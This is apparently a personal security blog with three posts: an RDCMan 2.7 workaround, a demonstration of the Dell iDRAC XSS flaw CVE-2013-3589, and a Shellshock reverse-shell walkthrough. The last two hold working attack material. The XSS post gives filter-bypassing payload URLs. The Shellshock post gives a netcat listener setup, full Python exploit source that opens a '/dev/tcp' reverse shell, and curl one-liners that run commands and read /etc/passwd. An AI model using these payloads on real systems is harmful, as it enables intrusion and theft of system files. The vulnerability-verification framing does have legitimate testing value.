Fly In Matrix

Saturday, July 25, 2015

How to fix Remote Desktop Connection Manager 2.7 decrypt error pop up window issue

I recently upgraded Remote Desktop Connection Manager (RDCMan) 2.2 to version 2.7. When I open the .rdg file, I get this giant popup window:

Because the file has so many hosts with encrypted password, the size of the error window exceed the screen. I couldn’t even get to the “ok” button.
To fix this issue, we can remove the <password> </password> pair from the .rdg file.
1) You may want to backup it, actually you should make a copy before open the .rdg file with version 2.7.
2) Open the .rdg file with Notepad++. Press ctrl+h to open the “Replace” popup window.
---Find what:<password>.*</password>
---Replace with: null
---Search mode: Regular expression

3) Click “Replace All” button and save the file.
4) Open it with RDCMan 2.7. no popup window anymore.
However, you will have to re-enter your password for these hosts.

Thursday, March 19, 2015

How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)

1. Nessus description:

The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

2. Demonstration:

1) Actually the login page does filter some Java scripts, so if you use the common script like <script>alert(1)</script>, it won’t work.
2) Example 1: pop up a javascript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E

3) Example 2: redirect to https://google.com

https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>

3. Recommendation

1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.

4. References:

1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411

Monday, October 20, 2014

How to get reverse shell with BASH (shellshock) vulnerability?

Pre-require:

1. Kali Linux

2. Download the python code from http://pastebin.com/166f8Rjx and save as “shellshock.py”

3. If you are trying to attack an https site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]), here I save it as “shellshocks.py”

4. Your Kali Linux IP

5. The vulnerable host IP

Steps

1. Run command “nc –lvp 9999”, listening on port 9999, you can change the port number if you want.

2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.

3. Now you can get the shell:

Some commands that can be used to verify Shellshock:

1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi

2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi

3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi

Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4 br="">    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data